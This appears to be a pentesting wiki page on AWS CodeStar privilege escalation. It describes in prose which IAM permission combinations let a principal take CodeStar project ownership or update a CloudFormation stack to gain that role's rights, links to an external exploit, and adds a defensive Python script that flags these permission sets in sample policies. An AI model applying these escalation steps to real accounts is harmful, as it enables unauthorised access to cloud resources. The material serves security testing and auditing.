AWS - Codestar Privesc
You can find more information about codestar in:
iam:PassRole, codestar:CreateProject
With these permissions you can abuse a CodeStar IAM role to perform arbitrary actions through a CloudFormation template. Check the following page:
codestar:CreateProject, codestar:AssociateTeamMember
This technique uses codestar:CreateProject to create a CodeStar project, and codestar:AssociateTeamMember to make an IAM user the owner of the new CodeStar project, which grants that user a new policy with a few extra permissions.
If you are already a member of the project, you can use the codestar:UpdateTeamMember permission to update your role to owner instead of using codestar:AssociateTeamMember.
Potential Impact: Privesc to the generated CodeStar policy. You can find an example of that policy in:
codestar:CreateProjectFromTemplate
Create a New Project:
Use the codestar:CreateProjectFromTemplate action to initiate the creation of a new project.
After successful creation, access is automatically granted for cloudformation:UpdateStack.
This access applies to a stack associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.
Update the Target Stack:
With the granted CloudFormation permissions, proceed to update the specified stack.
The stack name will typically follow one of two patterns:
awscodestar-<generic project name>-infrastructure
awscodestar-<generic project name>-lambda
The exact name depends on the chosen template (refer to the example exploit script).
Access and Permissions:
After the update, you obtain the capabilities granted to the CloudFormation IAM role attached to the stack.
Note: This does not by itself provide full administrator privileges. Other misconfigured resources in the environment may be needed to escalate privileges further.
For more information, check the original research: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. You can find the exploit at https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py
Potential Impact: Privesc to the CloudFormation IAM role.
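To audit an account for the permission sets covered in the three sections above, the following added example (not part of the original page or the referenced research) checks identity policy documents for each set, including grants made through wildcards such as codestar:Create*. The set labels, function names and sample policies are constructed for illustration. It assumes identity-based policies only and ignores NotAction, Resource and Condition on Allow statements, permissions boundaries and SCPs.

```python
import re

# Permission sets named on this page; holding every action in a set enables that path.
RISKY_SETS = {
    "PassRole+CreateProject": ["iam:PassRole", "codestar:CreateProject"],
    "CreateProject+AssociateTeamMember": ["codestar:CreateProject", "codestar:AssociateTeamMember"],
    "UpdateTeamMember (existing project member)": ["codestar:UpdateTeamMember"],
    "CreateProjectFromTemplate": ["codestar:CreateProjectFromTemplate"],
}

def as_list(value):
    return [] if value is None else value if isinstance(value, list) else [value]

def action_patterns(policies, effect):
    """Collect Action patterns from statements with the given Effect."""
    patterns = []
    for doc in policies:
        for stmt in as_list(doc.get("Statement")):
            if stmt.get("Effect") != effect:
                continue
            # Count a Deny only if unconditional on Resource "*", so a scoped Deny never hides a finding.
            if effect == "Deny" and ("Condition" in stmt or "*" not in as_list(stmt.get("Resource"))):
                continue
            patterns.extend(as_list(stmt.get("Action")))
    return patterns

def action_matches(action, patterns):
    # IAM action matching is case-insensitive; '*' and '?' are the only wildcards.
    regexes = (re.escape(p).replace(r"\*", ".*").replace(r"\?", ".") for p in patterns)
    return any(re.fullmatch(rx, action, re.IGNORECASE) for rx in regexes)

def risky_sets(policies):
    """Return the names of the page's permission sets that these policies grant."""
    allow = action_patterns(policies, "Allow")
    deny = action_patterns(policies, "Deny")
    return {name for name, actions in RISKY_SETS.items()
            if all(action_matches(a, allow) and not action_matches(a, deny) for a in actions)}

# Constructed sample input: identity policies per principal (not real account data).
SAMPLE = {
    "dev-alice": [{"Statement": [{"Effect": "Allow", "Resource": "*",
                   "Action": ["codestar:Create*", "codestar:AssociateTeamMember"]}]}],
    "ci-bob": [{"Statement": [
        {"Effect": "Allow", "Action": ["codestar:*", "iam:PassRole"], "Resource": "*"},
        {"Effect": "Deny", "Action": "codestar:CreateProject*", "Resource": "*"}]}],
    "ro-carol": [{"Statement": {"Effect": "Allow", "Action": "codestar:List*", "Resource": "*"}}],
}

print({principal: sorted(risky_sets(docs)) for principal, docs in SAMPLE.items()})
```

A principal that holds only codestar:Create* is still flagged for CreateProjectFromTemplate, which is why wildcard grants on the codestar namespace deserve review even when no policy names that action explicitly.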